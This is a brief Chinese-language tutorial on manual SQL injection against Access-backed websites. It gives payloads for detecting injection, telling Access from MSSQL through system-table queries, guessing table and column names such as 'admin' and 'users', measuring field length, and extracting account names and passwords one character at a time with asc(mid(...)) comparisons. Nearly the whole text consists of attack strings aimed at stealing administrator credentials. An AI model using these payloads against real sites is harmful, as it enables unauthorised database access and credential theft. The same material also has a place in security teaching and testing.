SQL手工注入之access手工注入

一、判断是否存在注入

‘       页面返回错误，可能存在注入

and 1=1  页面返回正确    and1=2 页面返回错误  可能存在注入

二、判断数据库类型

1.and (select count(*) from mysysobjects)>0  -返回权限不足 为access数据库

2.and (select count(*) from sysobjects)>0  -但会正常为MSSQL数据库

三、猜测表名

and exists(select * from 表名）-如果页面返回正常 则表明数据库中存在此表

例如：and exists(select * from admin)  返回正常 存在admin表

四、猜测字段名

and exists(select 字段名 from admin）猜测admin中是否存在某个字段

例如：and exists(select users from admin)  猜测admin中是否存在users字段

五、猜测字段长度

and (select top 1 len(字段名） from admin)>X   页面返回正确，表示字段长度为X（X为某个数字）

例如：and (select top 1 len(users) from admin )>5返回错误  >4返回正确  代表字段长度为5

六、猜测用户的账号和密码的ASCII码

and (select top 1 asc(mid(users,1,1)) from admin )=97 返回正确，则表示用户名第一个为a